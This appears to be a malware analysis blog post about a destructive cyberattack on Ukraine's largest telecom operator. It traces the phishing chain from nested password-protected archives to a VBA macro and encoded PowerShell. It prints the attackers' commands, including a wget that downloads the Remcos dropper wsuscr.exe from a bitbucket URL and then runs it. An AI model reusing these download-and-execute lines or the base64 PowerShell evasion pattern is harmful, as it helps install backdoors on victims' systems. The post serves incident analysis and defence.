In mid-December, it was revealed that a devastating cyberattack hit Ukr@ine's biggest telecommunications company. The attack disabled the company's services for days (!), leaving over twenty million Ukrainians without mobile communication and internet access.
Ukrainian officials described the attack as having disastrous consequences, causing the complete destruction of the telecoms operator's core infrastructure. The attackers managed to wipe out nearly all data, including thousands of virtual servers and PCs.
Below, you can see the attack chain, which begins with receiving a phishing email containing a malicious .zip attachment with a .doc file inside.
email => attach1.zip => attach1.rar + attach2.rar => attach.rar (password protected) => .doc (vba) => SMB \\89_23_98_22\LN\GB.exe => powershell bitbucket_org/.../wsuscr.exe
The .doc file merely shows a picture that prompts the potential victim to enable editing and content - in other words, to lower security settings and permit the execution of a malicious macro.
To evade anti-malware checks on the email server and victim's system, the doc file is packed into a multi-layered, password-protected archive. It contains a VBA macro that initiates the infection process by executing the malware downloader.
Below you can see the detailed (trimmed for clarity) execution flow.
powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...')) | Invoke-Expression"
To evade detection, the PS script to be executed is base64 encoded. The batch file passes the encoded script to PowerShell, instructing it to decode it on-the-fly via the command line rather than saving the script to disk.
Exploring the scripts
After decompressing the final RAR archive, the victim opens the malicious .doc file containing a malicious VBA macro. We can extract it using two tools: Frank Boldewin's OfficeMalScanner and Didier Stevens' oledump. Let's take a look at both.
> OfficeMalScanner.exe C:\Test\malicious.doc info
This command dumps macros into the MALICIOUS.DOC-Macros folder. To obtain oledump, we need to install it using the "pip install olefile" command.
Next, dump the document structure.
oledump.py -s 9 --vbadecompressskipattributes C:\Test\malicious.doc >C:\Test\s9_malicious_doc.txt
This bat file copies another executable, test2.exe, from the share and executes an encoded PS script. The bypass commands within the script body are packed.
This execution chain ends with the launch of Remcos dropper named wsuscr.exe from the aforementioned PS script.
wget "https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe" -outfile "$env:APPDATA\wsuscr.exe"
Invoke-Expression -Command "$env:APPDATA\wsuscr.exe"
Remcos serves as a backdoor, granting attackers full access to the compromised system.
References
https://cert.gov.ua/article/6276824
https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1